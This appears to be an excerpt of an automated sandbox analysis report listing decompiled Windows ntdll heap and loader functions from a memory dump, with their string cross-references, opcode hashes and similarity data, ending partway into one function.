minkernel\ntdll\ldrsnap.c, xrefs: 00AE933B, 00AE9367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00AE932A
LdrpFindDllActivationContext, xrefs: 00AE9331, 00AE935D

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: +{$LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-250045328
Opcode ID: c5b84d9106136d9bf33163a7486e43738105192e0904141f2486508961c07475
Instruction ID: eaab0f48cc655fc26f6a2a315f1af9d075624b4c307ce76ec4853d92e57c28c4
Opcode Fuzzy Hash: c5b84d9106136d9bf33163a7486e43738105192e0904141f2486508961c07475
Instruction Fuzzy Hash: FC41E332A00315EEDB35AB18C889A76B7B5BB12754F094579E904571E1EFBCED8086C1

Uniqueness

Uniqueness Score: -1.00%

Function 00A740E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00A740E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00A7B150();
					} else {
						E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A7B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E00A7B150(", passed to %s", _t29);
					}
					_push("\n");
					E00A7B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xb66378 = 1;
						asm("int3");
						 *0xb66378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x00a740e6
0x00a740e8
0x00a740f1
0x00ad042d
0x00ad044c
0x00ad0451
0x00ad042f
0x00ad0444
0x00ad0449
0x00ad045d
0x00ad0466
0x00ad046e
0x00ad0474
0x00ad0475
0x00ad047a
0x00ad048a
0x00ad048c
0x00ad0493
0x00ad0494
0x00ad0494
0x00000000
0x00ad049b
0x00000000

Strings

HEAP: , xrefs: 00AD044C
Invalid heap signature for heap at %p, xrefs: 00AD0458
RtlAllocateHeap, xrefs: 00AD0468
HEAP[%wZ]: , xrefs: 00AD043F
, passed to %s, xrefs: 00AD0469

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: fc603668227173b877f3ef70522e2ad67e54cd7fd77d06944021e062f6bd4e56
Instruction ID: 35371d6fe3dd14a29e79024b23eb7c96880ec1fcd5a4704f09b1785d2b647e0c
Opcode Fuzzy Hash: fc603668227173b877f3ef70522e2ad67e54cd7fd77d06944021e062f6bd4e56
Instruction Fuzzy Hash: 44012876111240BED219D768A91EF5277B4FF41B31F29C42AF50A477819BF89844C125

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00A9A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0xb68748 - 1;
					if( *0xb68748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E00A7B150();
									_t260 = _t257 + 4;
								} else {
									E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E00A7B150();
								_t257 = _t260 + 4;
								__eflags =  *0xb67bc8;
								if(__eflags == 0) {
									E00B32073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E00B3A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E00ACD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E00A9AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E00B3A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E00B3A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0xb68748 - 1;
					if( *0xb68748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E00A7B150();
							} else {
								E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E00A7B150();
							__eflags =  *0xb67bc8;
							if(__eflags == 0) {
								_t131 = E00B32073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x00a9a83a
0x00a9a83c
0x00a9a83e
0x00a9a841
0x00a9a844
0x00a9a84a
0x00a9aa53
0x00a9aa59
0x00a9aa59
0x00a9a858
0x00a9a85e
0x00a9aaf5
0x00a9aafc
0x00ae229e
0x00ae22a2
0x00ae22a8
0x00ae22b3
0x00ae22b5
0x00ae22bb
0x00ae22c1
0x00ae22c5
0x00ae22e6
0x00ae22eb
0x00ae22f0
0x00ae22c7
0x00ae22dc
0x00ae22e1
0x00ae22e1
0x00ae22f3
0x00ae22f8
0x00ae22fd
0x00ae2300
0x00ae2307
0x00ae230e
0x00ae230e
0x00ae2313
0x00ae2313
0x00ae22b5
0x00ae22a2
0x00a9aafc
0x00a9a864
0x00a9a869
0x00a9aa5c
0x00a9aa5e
0x00a9a86f
0x00a9a87f
0x00a9a885
0x00a9a885
0x00a9a88b
0x00a9a890
0x00a9a896
0x00a9ab0c
0x00a9ab0f
0x00a9ab15
0x00ae2320
0x00ae2320
0x00a9ab1b
0x00a9a89c
0x00a9a89f
0x00a9a8a2
0x00a9a8a2
0x00a9a8a5
0x00a9a8af
0x00a9a8b3
0x00a9a8b8
0x00a9aa66
0x00a9a8be
0x00a9a8c5
0x00a9a8c6
0x00a9a8ce
0x00ae2328
0x00ae2332
0x00ae2337
0x00ae2337
0x00a9a8ce
0x00a9a8d4
0x00a9a8d8
0x00a9a8db
0x00a9a8de
0x00a9a8e1
0x00a9a8e5
0x00a9a8e8
0x00a9a8f0
0x00a9a8f3
0x00ae234c
0x00ae2350
0x00ae2355
0x00ae2359
0x00ae2359
0x00a9a8f9
0x00a9a901
0x00a9aae4
0x00a9aae4
0x00a9aaea
0x00000000
0x00a9a907
0x00a9a90a
0x00a9a91d
0x00a9a91d
0x00000000
0x00a9a910
0x00a9a910
0x00a9a910
0x00a9a914
0x00a9a924
0x00a9a924
0x00a9a924
0x00a9a924
0x00a9a916
0x00a9a91b
0x00000000
0x00000000
0x00000000
0x00a9a91b
0x00a9a925
0x00a9a925
0x00a9a932
0x00a9a936
0x00a9a93c
0x00a9a93c
0x00a9a93c
0x00a9ab22
0x00a9ab24
0x00a9ab27
0x00a9ab27
0x00a9a942
0x00a9a944
0x00a9aaba
0x00a9aabd
0x00a9aac0
0x00a9aac0
0x00a9aac2
0x00a9ab2f
0x00a9aac4
0x00a9aac4
0x00a9aac7
0x00a9aaca
0x00a9aacc
0x00a9aace
0x00a9aace
0x00a9aace
0x00a9aad1
0x00a9aad1
0x00a9aad7
0x00a9aad9
0x00000000
0x00000000
0x00ae2361
0x00ae2369
0x00ae236b
0x00000000
0x00ae2371
0x00000000
0x00ae2371
0x00000000
0x00ae236b
0x00a9aac0
0x00a9a94a
0x00a9a94a
0x00a9a94d
0x00a9a94d
0x00a9a950
0x00a9a954
0x00ae2376
0x00ae2380
0x00a9a95a
0x00a9a95a
0x00a9a95c
0x00a9a95f
0x00a9a961
0x00a9a961
0x00a9a967
0x00a9a96a
0x00a9a972
0x00a9aa02
0x00a9aa06
0x00a9aa10
0x00a9aa16
0x00a9aa16
0x00a9aa1b
0x00a9aa21
0x00a9aa24
0x00a9aa27
0x00a9aa29
0x00a9aa2c
0x00a9aa32
0x00000000
0x00000000
0x00000000
0x00000000
0x00a9a978
0x00a9a978
0x00a9a97b
0x00a9a981
0x00a9a996
0x00a9a998
0x00a9a99f
0x00a9a9a2
0x00ae238a
0x00a9a9a8
0x00a9a9a8
0x00a9a9a8
0x00a9a9aa
0x00a9a9ad
0x00a9a9b0
0x00a9a9bb
0x00a9a9be
0x00a9a9c7
0x00a9a9c9
0x00a9a9c9
0x00a9a9cc
0x00a9a9d1
0x00a9aa6d
0x00a9aa70
0x00a9aa73
0x00a9aa75
0x00a9aa79
0x00a9aa7e
0x00a9aa82
0x00a9aa8f
0x00a9aa94
0x00a9aa96
0x00ae2392
0x00ae23a1
0x00ae23a1
0x00a9aa9c
0x00a9aa9f
0x00a9aaa2
0x00a9aaa2
0x00a9aaa8
0x00a9aaab
0x00a9aaaf
0x00000000
0x00a9aab5
0x00000000
0x00a9aab5
0x00a9a9d7
0x00a9a9d7
0x00a9a9da
0x00a9a9e0
0x00a9a9e3
0x00a9a9e6
0x00a9a9e9
0x00a9a9eb
0x00a9a9fd
0x00a9a9fd
0x00000000
0x00a9a9eb
0x00000000
0x00000000
0x00000000
0x00a9a983
0x00a9a983
0x00a9a983
0x00a9a987
0x00a9a995
0x00a9a995
0x00a9a995
0x00a9a995
0x00a9a989
0x00a9a98e
0x00000000
0x00a9a990
0x00000000
0x00a9a990
0x00a9a98e
0x00000000
0x00a9a983
0x00a9a972
0x00a9a90a
0x00a9aa34
0x00a9aa34
0x00a9aa40
0x00a9aa43
0x00a9aa46
0x00a9aa4d
0x00ae23ab
0x00ae23b2
0x00ae23b8
0x00ae23be
0x00ae23c3
0x00ae23c5
0x00ae23cb
0x00ae23d1
0x00ae23d5
0x00ae23f6
0x00ae23fb
0x00ae23d7
0x00ae23ec
0x00ae23f1
0x00ae2403
0x00ae2408
0x00ae2410
0x00ae2417
0x00ae2422
0x00ae2422
0x00ae2417
0x00ae23c5
0x00ae23b2
0x00000000

Strings

HEAP: , xrefs: 00AE22E6, 00AE23F6
HEAP[%wZ]: , xrefs: 00AE22D7, 00AE23E7
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00AE22F3
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00AE2403

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: a67a9b9a3645e2d81680f07ba3e31f5c891729bd4d7966100430529944e8b799
Instruction ID: 0747ea7627f17cdec070079bfce7f9d67c5a3809d72d3ee614a9ac7df00da823
Opcode Fuzzy Hash: a67a9b9a3645e2d81680f07ba3e31f5c891729bd4d7966100430529944e8b799
Instruction Fuzzy Hash: 7CD1CD74B002459FDF18CF68C590BAAB7F1FF68300F25856AE85A9B741E734AC45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00A9A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E00A9DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E00AB9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E00B3A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E00AB9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E00A7B150();
					} else {
						E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E00A7B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E00A97D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E00B3138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E00A97D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E00A97D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E00B31582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E00A97D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E00A97D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E00B31582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E00ACD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x00a9a229
0x00a9a231
0x00a9a23f
0x00a9a242
0x00a9a244
0x00a9a24c
0x00a9a255
0x00a9a25a
0x00a9a25f
0x00ae1c76
0x00ae1c78
0x00ae1c7e
0x00ae1c7f
0x00ae1c81
0x00ae1c82
0x00ae1c84
0x00ae1c89
0x00ae1c8b
0x00ae1c9e
0x00ae1c9e
0x00ae1cab
0x00ae1cb2
0x00000000
0x00ae1cb2
0x00ae1c8d
0x00ae1c92
0x00000000
0x00000000
0x00ae1c94
0x00ae1c98
0x00000000
0x00000000
0x00000000
0x00ae1c98
0x00a9a265
0x00a9a265
0x00a9a266
0x00a9a26f
0x00a9a270
0x00a9a276
0x00a9a277
0x00a9a279
0x00a9a27e
0x00a9a282
0x00ae1db5
0x00ae1dbb
0x00ae1dc1
0x00ae1dc5
0x00ae1de4
0x00ae1de9
0x00ae1dc7
0x00ae1ddc
0x00ae1de1
0x00ae1def
0x00ae1df3
0x00ae1df7
0x00ae1dfe
0x00ae1e06
0x00a9a302
0x00a9a308
0x00a9a308
0x00a9a288
0x00a9a28d
0x00a9a294
0x00ae1cc1
0x00a9a29a
0x00a9a29a
0x00a9a29a
0x00a9a29f
0x00ae1ccb
0x00ae1cd1
0x00ae1cd8
0x00ae1cea
0x00ae1cea
0x00ae1cd8
0x00a9a2a9
0x00a9a2af
0x00a9a2bc
0x00ae1cfd
0x00a9a2c2
0x00a9a2c2
0x00a9a2c2
0x00a9a2c7
0x00ae1d07
0x00ae1d0d
0x00ae1d14
0x00ae1d1f
0x00ae1d21
0x00ae1d2c
0x00ae1d2c
0x00ae1d2c
0x00ae1d47
0x00ae1d47
0x00ae1d14
0x00a9a2cd
0x00a9a2d2
0x00a9a2d9
0x00ae1d5a
0x00a9a2df
0x00a9a2df
0x00a9a2df
0x00a9a2e4
0x00ae1d69
0x00ae1d6b
0x00ae1d76
0x00ae1d76
0x00ae1d76
0x00ae1d91
0x00ae1d91
0x00a9a2ea
0x00a9a2f0
0x00a9a2f5
0x00ae1da8
0x00ae1dad
0x00ae1dad
0x00a9a2fd
0x00a9a300
0x00000000

Strings

HEAP: , xrefs: 00AE1DE4
HEAP[%wZ]: , xrefs: 00AE1DD7
`, xrefs: 00AE1C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 00AE1DF9

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: d64b92d70d64533c9cc974cdf548a3dc1d48464e36c05a68bba13c796f38d9bb
Instruction ID: 358ac92f0f633af3f8ba6642147e761b8155b64504d9c2b0a55ed2a3b6b005c4
Opcode Fuzzy Hash: d64b92d70d64533c9cc974cdf548a3dc1d48464e36c05a68bba13c796f38d9bb
Instruction Fuzzy Hash: 9751F0313046809FDB22DB68CD45F6777E8FF94B50F280869F9558B2A2D734D800CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B349A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 00B34A4A, 00B34A5D, 00B34A5F, 00B34AC4
This is located in the %s field of the heap header., xrefs: 00B34AD6
HEAP[%wZ]: , xrefs: 00B34A3D, 00B34AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 00B34A61

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 089f932b631bd8143e21adf60bad213e0215d2cb7f874688c093e28e1edd5289
Instruction ID: f46c4e6b5056e3dd824f684b1370260780d96fb9fa8995b4ae4af39abd2c1004
Opcode Fuzzy Hash: 089f932b631bd8143e21adf60bad213e0215d2cb7f874688c093e28e1edd5289
Instruction Fuzzy Hash: 1A31F235290504FFD710DB98C986F6B73E8FF04761F2585A5F8059B292E771BC80CA68

Uniqueness

Uniqueness Score: -1.00%

Function 00A999BF, Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00A999BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
